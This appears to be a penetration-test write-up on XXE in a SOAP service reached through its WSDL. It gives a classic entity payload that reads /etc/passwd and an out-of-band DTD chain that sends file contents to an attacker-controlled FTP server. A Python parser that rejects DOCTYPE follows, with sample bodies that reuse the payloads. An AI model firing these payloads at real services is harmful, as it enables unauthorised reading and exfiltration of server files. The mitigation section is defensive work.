While registering for an application, the assessment team identified a WSDL file at a path such as:
/services/ApiService?wsdl
We used the Wsdler Burp extension (https://portswigger.net/bappstore/594a49bb233748f2bc80a9eb18a2e08f) to parse the WSDL file, as shown in the image below:
We then sent this request to Repeater and started fuzzing it for XXE, beginning with classic XXE payloads such as:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<data>&file;</data>
As the two responses above show, we can confirm that the vulnerability exists, but with this payload we can only enumerate files on the server, not read their content.
In order to extract the content of a file, we need to exfiltrate it out-of-band to an emulated FTP server.
We set up an xxe.dtd file on our server with the following payload:
<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
Download and run the emulated FTP server from the following link (make sure it listens on the same port referenced in the DTD):
Then send the following payload in the vulnerable request, which loads the hosted DTD and triggers the nested entity:
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> <sessionId>&rrr;</sessionId>
As soon as you send the vulnerable request, the content of the /etc/passwd file starts arriving at the emulated FTP server, as shown in the screenshot below:
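On the fixing side, both payloads above depend on the request carrying a DOCTYPE (an inline entity in the first, an external parameter entity in the second), so a parser that refuses DOCTYPE outright stops both before anything is resolved. The following is an added example written here with the Python standard library, not code from the original write-up; the sample bodies, including the attacker.invalid host, are constructed.

```python
import xml.parsers.expat as expat

class DtdNotAllowed(ValueError):
    """Raised when a request body carries a DOCTYPE, which a SOAP request never needs."""

def parse_untrusted_xml(data: bytes) -> dict:
    """Parse data into {element name: text} while refusing all DTD processing.
    Both payloads in the write-up rely on a DOCTYPE (inline entity or external
    parameter entity), so rejecting DOCTYPE stops them before any entity resolves."""
    parser = expat.ParserCreate()
    # Never read parameter entities, so an external DTD (%asd;) is never fetched.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    fields, stack = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # An exception raised in a handler aborts Parse() and propagates to the caller.
        raise DtdNotAllowed(f"DOCTYPE {name!r} rejected")

    def on_external_entity(context, base, sysid, pubid):
        return 0  # 0 makes expat fail instead of resolving file:// or ftp:// URLs

    def on_start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def on_text(text):
        if stack:
            fields[stack[-1]] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return fields

def check_request(data: bytes) -> tuple:
    """Return ("ok", fields) for a clean body or ("rejected", reason) otherwise."""
    try:
        return "ok", parse_untrusted_xml(data)
    except (DtdNotAllowed, expat.ExpatError) as exc:
        return "rejected", str(exc)

# Constructed sample bodies (attacker.invalid is a placeholder host): one benign
# request plus the two payload shapes from the write-up above.
BENIGN = b"<sessionId>abc123</sessionId>"
CLASSIC = (b'<?xml version="1.0"?><!DOCTYPE data [<!ENTITY file SYSTEM '
           b'"file:///etc/passwd">]><data>&file;</data>')
OOB = (b'<!DOCTYPE a [<!ENTITY % asd SYSTEM "http://attacker.invalid/xxe.dtd">'
       b'%asd; %c;]><sessionId>&rrr;</sessionId>')
```

The same two settings (no DOCTYPE, no parameter-entity processing) are what to look for in whatever XML library the SOAP stack actually uses; the check here runs entirely offline because nothing is ever fetched.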